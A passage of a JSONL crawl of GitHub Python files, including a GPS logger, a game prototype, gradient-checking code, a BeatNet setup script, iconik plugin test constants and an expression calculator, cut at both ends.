data from GPS and flush buffer as required\n GPIO.output(GPS_LED, GPIO.HIGH)\n (excess, buffer, bufferIndex, timestampBuffer) = readFromGPS(pi, excess, buffer, bufferIndex, timestampBuffer)\n if bufferIndex == bufferSize:\n (buffer, bufferIndex, timestampBuffer) = flushBuffer(buffer, bufferIndex, timestampBuffer)\n # gps has just been disabled, flush the buffer\n elif not GPS_Enabled and GPS_Prev:\n GPIO.output(GPS_LED, GPIO.LOW)\n (buffer, bufferIndex, timestampBuffer) = flushBuffer(buffer, bufferIndex, timestampBuffer)\n else:\n GPIO.output(GPS_LED, GPIO.LOW)\n\n except Exception as e:\n print(e)\n pi.bb_serial_read_close(RX)\n pi.stop()\n destroy()\n failstate()\n\nif __name__ == '__main__': # Program start from here\n try:\n try:\n pi = None\n file = None\n print(\"Initializing\")\n (pi, file) = init(pi, file)\n print(\"initialisation complete\\nEntering core\")\n core(pi, file)\n except Exception as e:\n print(e)\n except KeyboardInterrupt: # When 'Ctrl+C' is pressed, the child program destroy() will be executed\n destroy()","repo_name":"u5561865-drc/yerraloon-2018s2","sub_path":"DataLogger/GPS/GPS.py","file_name":"GPS.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"30307558657","text":"from Char import char\nfrom Spell import spell\nfrom Cast import cast\n\nimport random\n\nclass game:\n\n player = None\n enemy = None\n\n def __init__(self):\n self.setup()\n\n def setup(self):\n\n # Setup the player character\n #self.player = char(input('Character Name: '))\n self.player = char('Kazagha', 100)\n\n # Select an enemy at random\n self.enemy = self.random_enemy()\n\n def random_enemy(self):\n enemies = ['Ork','Goblin','Giant Spider','Bandit','Hill Giant','Stone Giant','Frost Giant','Fire Giant',\n 'Cloud Giant', 'Storm Giant']\n\n return char(random.choice(enemies), 50)\n\nif __name__ == \"__main__\":\n the_game = game()\n\n with the_game.player as char:\n print(char.name)\n\n #fireball = spell('Fireball', damage=10)\n #icebolt = spell('Icebolt', damage=5)\n\n #print(f'{fireball.damage} vs {icebolt.damage}')\n\n #with cast(fireball) as c:\n # with cast(c, icebolt) as d:\n # print(f'{c.damage} vs. {d.damage}')\n # d.cast()\n\n with spell('Fireball', damage=10) as f:\n #print(f.damage)\n f.cast()\n","repo_name":"Kazagha/Python-Prototype","sub_path":"ContextGame/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"18432037109","text":"import json\nimport os\n\nfrom client.file_manager.FileConstants import *\nimport client.CONSTANTS as CONSTANTS\n\n\n##\n# Manages creation and interpretation of .ptorrent files\n#\n# @author Paul Rachwalski\n# @date Apr 3, 2015\n##\nclass MetadataFile(object):\n\n ##\n # Initializes metadata variables\n ##\n def __init__(self):\n self.tracker = None\n self.filename = None\n self.file_id = None\n self.size = 0\n self.piece_size = 0\n\n return\n\n ##\n # Creates a metadata file for the given file\n #\n # @param filename The path to the file\n # @return The path to the metadata file\n ##\n def generate(self, filename, tracker, piece_size=262144):\n if not os.path.isfile(filename):\n return None\n\n self.tracker = tracker\n self.filename = filename.split(\"/\")[-1]\n self.size = os.path.getsize(filename)\n self.piece_size = piece_size\n\n # File ID consists of the filename, size, and piece size separated by dashes\n self.file_id = self.filename + \"-\" + str(self.size) + \"-\" + str(self.piece_size)\n\n metadata = {TRACKER: self.tracker,\n FILE_ID: self.file_id,\n FILE_NAME: self.filename,\n FILE_SIZE: self.size,\n FILE_PIECE_SIZE: self.piece_size}\n json_str = json.dumps(metadata, indent=4)\n\n meta_filename = CONSTANTS.ROOT + CONSTANTS.META_FILES + self.file_id + \".\" + METADATA_EXT\n\n with open(meta_filename, 'w') as meta_file:\n meta_file.write(json_str)\n\n return meta_filename\n\n ##\n # Loads all relavant information from a given metadata file\n #\n # @param metadata_file The path to the metadata file\n # @return The current metadata file object\n ##\n def parse(self, metadata_file):\n good_ext = metadata_file.split(\".\")[-1] == METADATA_EXT\n good_file = os.path.isfile(metadata_file)\n if not good_ext or not good_file:\n return None\n\n with open(metadata_file, 'r') as json_file:\n metadata = json.load(json_file)\n\n self.tracker = metadata[TRACKER]\n self.file_id = metadata[FILE_ID]\n self.filename = metadata[FILE_NAME]\n self.size = metadata[FILE_SIZE]\n self.piece_size = metadata[FILE_PIECE_SIZE]\n\n return self\n\n","repo_name":"rchwlsk2/pTorrent","sub_path":"client/file_manager/MetadataFile.py","file_name":"MetadataFile.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16653048717","text":"import pandas as pd\nfrom pandasql import sqldf, load_births, load_meat\n\nbirths = load_births()\nprint(sqldf('SELECT * FROM births where births > 250000 limit 5;', locals()))\n\n\nq = \"\"\"\n select\n date(date) as DOB, \n sum(births) as \"Total Births\"\n from \n births \n group by \n date\n limit 10;\n \"\"\"\nprint(sqldf(q, locals()))\nprint(sqldf(q, globals()))\n\ndef pysqldf(q):\n return sqldf(q, globals())\nprint(pysqldf(q))\n\ndfcust = pd.read_csv(r\"C:\\Users\\USER\\Desktop\\Lecture1_data\\customers.csv\")\nprint(dfcust.head(3))\nprint(dfcust.dtypes)\nprint(pysqldf(\"\"\"select age as \"Cust.Age\" from dfcust limit 10;\"\"\"))\n\n\n","repo_name":"Peiting01/For_Python","sub_path":"connect_database/sql-trial.py","file_name":"sql-trial.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70620259344","text":"from Logic.CRUD import adauga_vanzare\nfrom Tests.testall import run_all_test\nfrom UI.command_line_console import meniu\nfrom UI.console import run_menu\n\n\ndef meniuu():\n print(\"1. Prima metoda de rezolvare al UI\")\n print(\"2. A doua metoda de UI\")\n print(\"3. Iesire\")\n\n\ndef main():\n run_all_test()\n #run_m1enu([])\n\n while True:\n meniuu()\n optiune = input(\"Dati optiunea: \")\n\n if optiune == \"1\":\n lista = []\n lista = adauga_vanzare(\"1\", \"Sange de zapada\", \"politist\", 35, \"gold\", lista)\n lista = adauga_vanzare(\"2\", \"Enigma Otiliei\", \"bildugsroman\", 30, \"none\", lista)\n print(run_menu(lista))\n elif optiune == \"2\":\n lista = []\n lista = adauga_vanzare(\"1\", \"Sange de zapada\", \"politist\", 35, \"gold\", lista)\n lista = adauga_vanzare(\"2\", \"Enigma Otiliei\", \"bildugsroman\", 30, \"none\", lista)\n print(meniu(lista))\n elif optiune == \"3\":\n break\n else:\n print(\"Optiune gresita! Reincercati: \")\n\n\n\nmain()\n","repo_name":"AP-MI-2021/lab-567-andreeailies12","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28240635217","text":"from DeepLearning.CourseTwo.gc_utils import *\n# from DeepLearning.CourseTwo.testCases import *\n\n# Gradient+Checking\n\n\n# 1维梯度检验\ndef forward_propagation(x, theta):\n return theta * x\n\n\ndef backward_propagation(x, theta):\n dtheta = x\n return dtheta\n\n\ndef gradient_check(x, theta, epsilon=1e-7):\n # compute gradapprox\n thetaplus = theta + epsilon\n thetaminus = theta - epsilon\n J_plus = forward_propagation(x, thetaplus)\n J_minus = forward_propagation(x, thetaminus)\n gradapprox = (J_plus - J_minus) / (2 * epsilon)\n\n grad = backward_propagation(x, theta)\n\n numerator = np.linalg.norm(grad - gradapprox)\n denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox)\n difference = numerator / denominator\n\n if difference < 1e-7:\n print(\"The gradient is correct!\")\n else:\n print(\"The gradient is wrong!\")\n return difference\n\n\n# 多维梯度检验\ndef forward_propagation_n(X, Y, parameters):\n m = X.shape[1]\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n\n Z1 = np.dot(W1, X) + b1\n A1 = relu(Z1)\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n\n cost = - 1 / m * (np.dot(Y, np.log(A3).T) + np.dot((1 - Y), np.log(1 - A3).T))\n cache = (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3)\n return cost, cache\n\n\ndef backward_propagation_n(X, Y, cache):\n m = X.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n\n dZ3 = A3 - Y\n dW3 = 1 / m * np.dot(dZ3, A2.T)\n db3 = 1 / m * np.sum(dZ3, axis=1, keepdims=True)\n\n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1 / m * np.dot(dZ2, A1.T)\n db2 = 1 / m * np.sum(dZ2, axis=1, keepdims=True)\n\n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1 / m * np.dot(dZ1, X.T)\n db1 = 1 / m * np.sum(dZ1, axis=1, keepdims=True)\n\n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\n \"dA2\": dA2, \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2,\n \"dA1\": dA1, \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n return gradients\n\n\ndef gradient_check_n(parameters, gradients, X, Y, epsilon=1e-7):\n parameters_values, _ = dictionary_to_vector(parameters)\n grad = gradients_to_vector(gradients)\n num_parameters = parameters_values.shape[0]\n J_plus = np.zeros((num_parameters, 1))\n J_minus = np.zeros((num_parameters, 1))\n gradapprox = np.zeros((num_parameters, 1))\n\n for i in range(num_parameters):\n theta_plus = np.copy(parameters_values)\n theta_plus[i][0] += epsilon\n J_plus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(theta_plus))\n\n theta_minus = np.copy(parameters_values)\n theta_minus[i][0] -= epsilon\n J_minus[i], _ = forward_propagation_n(X, Y, vector_to_dictionary(theta_minus))\n\n gradapprox[i] = (J_plus[i] - J_minus[i]) / (2 * epsilon)\n\n numerator = np.linalg.norm(grad - gradapprox)\n denominator = np.linalg.norm(grad) + np.linalg.norm(gradapprox)\n difference = numerator / denominator\n\n if difference < 1e-7:\n print(\"The gradient is correct! difference = \" + str(difference))\n else:\n print(\"The gradient is wrong! difference = \" + str(difference))\n return difference\n","repo_name":"TimePickerWang/DeepLearning","sub_path":"CourseTwo-Improving Deep Neural Networks/assignment1_3GradientChecking.py","file_name":"assignment1_3GradientChecking.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"} +{"seq_id":"32619732094","text":"from infra.views import PaginatedBaseView\nfrom models.models.model import Model\nfrom helpers.pagination import PaginatedResponse\nfrom helpers.view_helpers import require_jwt\nfrom users.models.user import User\nfrom infra.request.errors import (\n BadRequestError,\n)\n\n\nclass ListUserModelsView(PaginatedBaseView):\n\n @require_jwt\n def validate(self, request, user_id, *args, **kwargs):\n super().validate(request, *args, **kwargs)\n if not User.objects.filter(id=user_id).exists():\n raise BadRequestError('The provided user does not exist.')\n\n def run(self, request, page, user_id, *args, **kwargs):\n filters = {'user_id': user_id}\n if self.user_payload['access_level'] < User.Type.ADMIN_USER_TYPE and self.user_payload['id'] != user_id:\n filters = {'privacy': Model.Privacy.PUBLIC.value}\n query = Model.objects.filter(**filters).order_by('id')\n return PaginatedResponse('models', query, page)\n","repo_name":"LautaroNavarro/3dvortex","sub_path":"src/models/views/model_views/list_user_models.py","file_name":"list_user_models.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"118952958","text":"\"\"\"\nCreated 07-01-21 by Mojtaba Heydari\n\"\"\"\n\n\n# Local imports\n# None.\n\n# Third party imports\n# None.\n\n# Python standard library imports\nimport setuptools\nfrom setuptools import find_packages\nimport distutils.cmd\n\n\n# Required packages\nREQUIRED_PACKAGES = [\n 'numpy',\n 'cython',\n 'librosa>=0.8.0',\n 'numba==0.54.1', # Manually specified here as librosa incorrectly states that it is compatible with the latest version of numba although 0.50.0 is not compatible. \n 'scipy',\n 'mido>=1.2.6',\n 'pytest',\n #'pyaudio',\n ##'pyfftw',\n 'madmom',\n 'torch',\n 'Matplotlib',\n]\n\n\nclass MakeReqsCommand(distutils.cmd.Command):\n \"\"\"A custom command to export requirements to a requirements.txt file.\"\"\"\n\n description = 'Export requirements to a requirements.txt file.'\n user_options = []\n\n def initialize_options(self):\n \"\"\"Set default values for options.\"\"\"\n pass\n\n def finalize_options(self):\n \"\"\"Post-process options.\"\"\"\n pass\n\n def run(self):\n \"\"\"Run command.\"\"\"\n with open('./requirements.txt', 'w') as f:\n for req in REQUIRED_PACKAGES:\n f.write(req)\n f.write('\\n')\n\n\nsetuptools.setup(\n cmdclass={\n 'make_reqs': MakeReqsCommand\n },\n\n # Package details\n name=\"BeatNet\",\n version=\"1.1.0\",\n package_dir={\"\": \"src\"},\n packages=find_packages(where=\"src\"),\n # packages=find_packages(),\n include_package_data=True,\n install_requires=REQUIRED_PACKAGES,\n\n # Metadata to display on PyPI\n author=\"Mojtaba Heydari\",\n author_email=\"mhydari@ur.rochester.edu\",\n description=\"A package for online and offline music beat, downbeat tempo and meter tracking using BeatNet AI\",\n keywords=\"Beat tracking, Downbeat tracking, meter detection, tempo tracking, particle filtering, real-time beat, real-time tempo\",\n url=\"https://github.com/mjhydri/BeatNet\"\n\n\n # CLI - not developed yet\n #entry_points = {\n # 'console_scripts': ['beatnet=beatnet.cli:main']\n #}\n)\n","repo_name":"mjhydri/BeatNet","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"47"} +{"seq_id":"1308021805","text":"import torch\nfrom torch import autograd\nfrom datetime import date\nimport data_loader\n\nSTART_TAG = \"\"\nSTOP_TAG = \"\"\nEMBEDDING_DIM = 100\n\n\ndef convert_to_tags(result):\n tags = []\n tag_to_idx = data_loader.load_tag_to_idx()\n for numT in result[1]:\n tags.extend(key for key, value in tag_to_idx.items() if value == numT)\n return tags\n\n\ndef to_scalar(var):\n # returns a python float\n return var.view(-1).data.tolist()[0]\n\n\ndef argmax(vec):\n # return the argmax as a python int\n _, idx = torch.max(vec, 1)\n return to_scalar(idx)\n\n\ndef prepare_sequence(seq, to_idx):\n word_tensor = []\n for word in seq:\n if word not in to_idx:\n to_idx[word] = len(to_idx)\n word_tensor.append(to_idx[word])\n\n tensor = torch.LongTensor(word_tensor)\n return autograd.Variable(tensor)\n\n\n# Compute log sum exp in a numerically stable way for the forward algorithm\ndef log_sum_exp(vec):\n max_score = vec[0, argmax(vec)]\n max_score_broadcast = max_score.view(1, -1).expand(1, vec.size()[1])\n return max_score + \\\n torch.log(torch.sum(torch.exp(vec - max_score_broadcast)))\n\n\ndef load_checkpoint(filename, model=None):\n print(\"loading model...\")\n checkpoint = torch.load(filename)\n if model:\n model.load_state_dict(checkpoint[\"state_dict\"])\n epoch = checkpoint[\"epoch\"]\n loss = checkpoint[\"loss\"]\n print(\"saved model: epoch = %d, loss = %f\" % (epoch, loss))\n return epoch, checkpoint[\"train\"], checkpoint[\"eval\"]\n\n\ndef save_checkpoint(model, epoch, loss, train_history, eval_histories):\n print(\"saving model...\")\n d = date.today()\n filename = d.strftime(\"%d%m%y\")\n checkpoint = {}\n checkpoint[\"state_dict\"] = model.state_dict()\n checkpoint[\"epoch\"] = epoch\n checkpoint[\"loss\"] = loss\n checkpoint[\"train\"] = train_history\n checkpoint[\"eval\"] = eval_histories\n save_file_name = filename + \".epoch%d\" % epoch\n torch.save(checkpoint, save_file_name)\n\n print(\"saved model: epoch = %d, loss = %f\" % (checkpoint[\"epoch\"], checkpoint[\"loss\"]))\n","repo_name":"niros7/NER","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35606363776","text":"from tkinter import *\n\nroot = Tk()\n\nw = Canvas(root, width=200, height=100, background=\"red\")\nw.pack()\n\nw.create_line(0, 50, 200, 50, fill=\"yellow\")\nw.create_line(100, 0, 100, 100, fill=\"blue\", dash=(4, 4))\nw.create_rectangle(50, 25, 150, 75, fill=\"purple\")\n\nmainloop()\n","repo_name":"pirateunclejack/python-tkinter","sub_path":"tk31.py","file_name":"tk31.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22741059339","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\nn = int(input())\ngraph = [list(map(int, input().split())) for _ in range(n)]\ndx = [0, 0, -1, 1]\ndy = [1, -1, 0, 0]\ndp = [[-1]*n for _ in range(n)]\nans = 0\n\ndef dfs(x, y):\n global ans\n if dp[x][y] == -1:\n dp[x][y] = 0\n for i in range(4):\n rx, ry = x + dx[i], y + dy[i]\n if 0 <= rx < n and 0 <= ry < n and graph[rx][ry] > graph[x][y]:\n dp[x][y] = max(dp[x][y], dfs(rx, ry))\n \n return dp[x][y] + 1\n\n\n\n\nfor i in range(n):\n for j in range(n):\n ans = max(dfs(i, j), ans)\n \n\nprint(ans)","repo_name":"LEEHYUNDONG/codingTest","sub_path":"codingTest_python/BOJ/greedyPanda.py","file_name":"greedyPanda.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2114120578","text":"import iconik\nimport responses\n\nfrom common import AUTH_TOKEN_NAME, SHARED_SECRET_NAME\n\nAPP_ID = \"ICONIK_PLUGIN\"\nLL_STORAGE_ID = \"d39b62e1-c586-438a-a82b-70543c228c1b\"\nB2_STORAGE_ID = \"73a746d2-a3ed-4d61-8fd9-aa8f37a27bbb\"\nINVALID_STORAGE_ID = '4e14b12e-ce4c-4920-a2b8-7a8dfa533256'\n\n# Values for secrets\nAUTH_TOKEN = \"SECRET_SQUIRREL\"\nSHARED_SECRET = 'top_secret'\n\nSECRETS = { \n SHARED_SECRET_NAME: SHARED_SECRET,\n AUTH_TOKEN_NAME: AUTH_TOKEN\n}\n\n# Random UUIDs for objects\nJOB_ID = 'eff79bf8-c782-11ec-8e9b-b66ad3c6ae38'\nASSET_ID = '0d56db81-1b8e-4a68-9658-98ad9a94d841'\nORIGINAL_FILE_SET_ID = '0436578d-8418-48b0-89ad-9c719b65137f'\nPPRO_PROXY_FILE_SET_ID = '076ac114-de02-427f-b1aa-7ea6cf1c3835'\nCOLLECTION_ID = '8ae20508-88b0-414e-8b4c-3fa2683e79e0'\nSUBCOLLECTION_ID = 'bf049e70-6749-4e44-a85b-7457236cdf4e'\nMULTI_COLLECTION_ID = '7e6abeea-4bff-4153-912d-2880617046ce'\n\nORIGINAL_FORMAT_NAME = 'ORIGINAL'\nORIGINAL_FORMAT_ID = '0fcfe5f1-eb85-4529-9bd0-3e856b358c81'\nPPRO_PROXY_FORMAT_NAME = 'PPRO_PROXY'\nPPRO_PROXY_FORMAT_ID = 'a45fc28d-0deb-4e14-8c79-1fc11966177c'\n\nFORMATS = {\n ORIGINAL_FORMAT_NAME: ORIGINAL_FORMAT_ID,\n PPRO_PROXY_FORMAT_NAME: PPRO_PROXY_FORMAT_ID\n}\n\nPAYLOAD = {\n \"user_id\": \"256ebe90-c0c8-11ec-9fcd-0648baddf8b3\",\n \"system_domain_id\": \"57016980-6e13-11e8-ab5a-0a580a3c0f5c\",\n \"context\": \"BULK\",\n \"action_id\": \"86f485b2-c71e-11ec-93c4-32f3401f5ebb\",\n \"asset_ids\": [\n ASSET_ID\n ],\n \"collection_ids\": [\n SUBCOLLECTION_ID\n ],\n \"saved_search_ids\": [],\n \"metadata_view_id\": None,\n \"metadata_values\": None,\n \"date_created\": \"2022-04-29T00:22:10.316685\",\n \"auth_token\": AUTH_TOKEN\n}\n\n\ndef assert_copy_call_counts(storage_id, format_count):\n # There should be two calls to bulk copy per format - one for the asset and one\n # for the collection\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/storages/{storage_id}/bulk/',\n 2 * format_count\n )\n\n\ndef assert_delete_call_counts():\n # The asset should be deleted and purged twice per format - once directly\n # and once via the subcollection\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/assets/{ASSET_ID}/file_sets/{ORIGINAL_FILE_SET_ID}/',\n 2\n )\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/assets/{ASSET_ID}/file_sets/{ORIGINAL_FILE_SET_ID}/purge/',\n 2\n )\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/assets/{ASSET_ID}/file_sets/{PPRO_PROXY_FILE_SET_ID}/',\n 2\n )\n assert responses.assert_call_count(\n f'{iconik.ICONIK_FILES_API}/assets/{ASSET_ID}/file_sets/{PPRO_PROXY_FILE_SET_ID}/purge/',\n 2\n )\n","repo_name":"backblaze-b2-samples/b2-iconik-plugin","sub_path":"test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22434028263","text":"from calc_oppt_parser import (AstParser, token_func, arith, UNameEnum, Tokenizer)\n\nfrom Ruikowa.ObjectRegex.ASTDef import Ast\nfrom Ruikowa.ErrorHandler import ErrorHandler\nfrom numbers import Real\n\nfrom typing import (Optional, Iterable, Generic, TypeVar, Iterator)\nfrom collections import Iterable as CIterable\nfrom functools import reduce\nfrom toolz import curry\n\nimport operator\n\nT = TypeVar('T')\n\nsrc_code_token_parse = ErrorHandler(arith.match, token_func).from_source_code\n\nop_priorities = {\n \"+\": 1,\n \"-\": 1,\n \"*\": 2,\n \"/\": 2,\n \"//\": 2\n}\nop_func = {\n \"+\": operator.add,\n \"-\": operator.sub,\n \"*\": operator.mul,\n \"/\": operator.truediv,\n \"//\": operator.floordiv\n}\n\n\ndef parse(src: str) -> Ast:\n filename = ''\n return src_code_token_parse(filename, src)\n\n\ndef flatten(seq):\n for each in seq:\n if isinstance(each, CIterable) and not isinstance(each, str):\n yield from flatten(each)\n yield each\n\n\ndef ast_for_decimal(decimal: Ast) -> Real:\n return eval(''.join(map(lambda _: _.string, flatten(decimal))))\n\n\ndef ast_for_arith(arith: Ast) -> Real:\n if len(arith) is 1:\n return ast_for_factor(arith[0])\n return visit_bin_expr(lambda _: ast_for_factor(_) if _.__class__ is Ast else _, DoublyList.from_iter(arith))\n\n\ndef ast_for_factor(factor: Ast) -> Real:\n if len(factor) is 2:\n s, atom = factor\n return -ast_for_atom(atom) if s.string is '-' else ast_for_atom(atom)\n return ast_for_atom(factor[0])\n\n\ndef ast_for_atom(atom: Ast) -> Real:\n if atom[0].name is UNameEnum.decimal:\n return ast_for_decimal(atom[0])\n return ast_for_arith(atom[1])\n\n\nclass DoublyList(Iterable, Generic[T]):\n\n def __init__(self, content: T, prev: 'Optional[DoublyList[T]]' = None, next: 'Optional[DoublyList]' = None):\n self.content: T = content\n self.next = next\n self.prev = prev\n\n def __iter__(self) -> 'Iterator[DoublyList[T]]':\n yield self\n if self.next:\n yield from self.next\n\n def __str__(self):\n return f'[{self.content}{self.next}]'\n\n __repr__ = __str__\n\n @classmethod\n def from_iter(cls, iterable: 'Iterable') -> 'Optional[DoublyList]':\n if not iterable:\n return None\n s_iterable = iter(iterable)\n try:\n fst = cls(next(s_iterable))\n except StopIteration:\n return None\n\n reduce(lambda a, b: setattr(a, \"next\", cls(b)) or setattr(a.next, \"prev\", a) or a.next, s_iterable, fst)\n return fst\n\n\n@curry\ndef fmap(t, func):\n return lambda *args: func(*map(t, args))\n\n\ndef visit_bin_expr(func, seq: 'DoublyList[AstParser]'):\n def sort_by_func(e: 'DoublyList[Tokenizer]'):\n return op_priorities[e.content.string]\n\n functor = fmap(func)\n\n op_nodes = (each for each in seq if each.content.name is not UNameEnum.factor)\n op_nodes: DoublyList[Tokenizer] = sorted(op_nodes, key=sort_by_func, reverse=True)\n\n for each in op_nodes:\n bin_expr = functor(op_func[each.content.string])(each.prev.content, each.next.content)\n each.content = bin_expr\n try:\n each.prev.prev.next = each\n each.prev = each.prev.prev\n except AttributeError:\n pass\n\n try:\n each.next.next.prev = each\n each.next = each.next.next\n except AttributeError:\n pass\n\n each: DoublyList[Real]\n return each.content\n\n\ndef repl():\n while True:\n try:\n inp = input('my_calc:: ')\n print(ast_for_arith(parse(inp)))\n except KeyboardInterrupt:\n print('\\nbye')\n import sys\n sys.exit(0)\n\n\nif __name__ == '__main__':\n repl()\n","repo_name":"thautwarm/ebnfparser-dev-notes","sub_path":"code_examples/calc/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5211811530","text":"import os\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nfrom adapters.tip_adapter import ClipTipAdapter\n\n\n# import for clearml\nimport clip\nimport torch\nimport torchvision\nimport numpy as np\nimport sklearn\nimport tqdm\n\nrun_clearml = False\n\ncifar_templates = [\n 'a photo of a {}.',\n 'a blurry photo of a {}.',\n 'a black and white photo of a {}.',\n 'a low contrast photo of a {}.',\n 'a high contrast photo of a {}.',\n 'a bad photo of a {}.',\n 'a good photo of a {}.',\n 'a photo of a small {}.',\n 'a photo of a big {}.',\n 'a photo of the {}.',\n 'a blurry photo of the {}.',\n 'a black and white photo of the {}.',\n 'a low contrast photo of the {}.',\n 'a high contrast photo of the {}.',\n 'a bad photo of the {}.',\n 'a good photo of the {}.',\n 'a photo of the small {}.',\n 'a photo of the big {}.',\n]\n\n\nclass OodCifar10(torchvision.datasets.CIFAR10):\n def __init__(self, data_path, transform, train, templates=None):\n super(OodCifar10, self).__init__(root=data_path,\n transform=transform,\n train=train,\n download=True\n )\n self.targets = np.array(self.targets)\n self.templates = templates if templates else cifar_templates\n self.idx_to_class = {value: key for (key, value) in self.class_to_idx.items()}\n\n\ndef main():\n dataset = OodCifar10\n\n tip_adapter = ClipTipAdapter(dataset=dataset,\n kshots=16,\n augment_epochs=1,\n lr=0.001,\n eps=1e-4)\n\n result = tip_adapter.compare()\n return result\n\n\nif __name__ == '__main__':\n\n if run_clearml:\n from clearml import Task\n print(\"running clearml\")\n task = Task.init(project_name=\"ma_fmeyer\", task_name=\"tip adapter testing\")\n task.execute_remotely('5e62040adb57476ea12e8593fa612186')\n\n main()\n","repo_name":"gitfabianmeyer/ood-detection","sub_path":"run_tip_single_set_copy.py","file_name":"run_tip_single_set_copy.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71233482702","text":"#!python3\n\n\"\"\"\nA class for keeping a table of y-values vs. x-values\n and interpolating y-values for other x-values.\n\n@author Erel Segal-Halevi\n@since 2017-10\n\"\"\"\n\n\nimport os\nfrom typing import Callable\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport ironing\nfrom log_progress import log_progress\n\n\nclass InterpolationTable:\n\t\"\"\"\n\tContains a table of x-values and corresponding y-values.\n\tCan be used for interpolating y-values for other x-values.\n\tCan be saved/loaded to/from a file.\n\tNOTE: the class assumes that the function should be weakly-increasing.\n\t\"\"\"\n\n\tdef __init__(self, xName:str, yName:str, fileName:str, valueCalculationFunction:Callable):\n\t\tself.xValues = None # 1-dimensional array\n\t\tself.yValuesSamples = None # 2-dimensional array. Every sample is a row; every x-value is a column.\n\t\tself.xName = xName\n\t\tself.yName = yName\n\t\tself.fileName = fileName\n\t\tself.valueCalculationFunction = valueCalculationFunction\n\t\tself.regressionFunction = None\n\t\tself.regressionString = \"\"\n\n\tdef numOfSamples(self):\n\t\treturn 0 if self.yValuesSamples is None else len(self.yValuesSamples)\n\n\tdef calculateTable(self, xValues: list, numOfSamples:int = 1, recreateAllSamples:bool = False, numXValues:int = None, saveAfterEachSample:bool=False):\n\t\t\"\"\"\n\t\tNumerically calculate a table that gives, for each channel-capacity, its optimal reset-radius.\n\t\tThis table is used for interpolation by self.getOptimalResetRadius.\n\n\t\ttheFunction: gets an x-value and returns the corresponding y-value.\n\t\tnumOfSamples: how many samples to run (the results will be averaged).\n\t\trecreateAllSamples: if True, all numOfSamples samples will be re-calculated. If False, only the missing will be re-calculated.\n\t\t\"\"\"\n\t\tif recreateAllSamples:\n\t\t\tself.yValuesSamples = np.zeros((0, len(xValues)))\n\t\t\tnumOfExistingSamples = 0\n\t\telse:\n\t\t\tnumOfExistingSamples = 0 if self.yValuesSamples is None else len(self.yValuesSamples)\n\t\t\tif numOfExistingSamples >= numOfSamples:\n\t\t\t\treturn\n\t\tif numXValues is None:\n\t\t\tnumXValues = len(xValues)\n\t\tself.xValues = xValues\n\t\tfor iSample in range(numOfExistingSamples, numOfSamples):\n\t\t\tyValues = []\n\t\t\tfor xValue in log_progress(xValues, every=1, name=self.xName, size=numXValues):\n\t\t\t\tyValue = self.valueCalculationFunction(xValue, iSample)\n\t\t\t\tyValues.append(yValue)\n\t\t\tyValuesArray = np.asarray(yValues)\n\t\t\tself.yValuesSamples = np.r_[self.yValuesSamples, [yValuesArray]] # add row; see 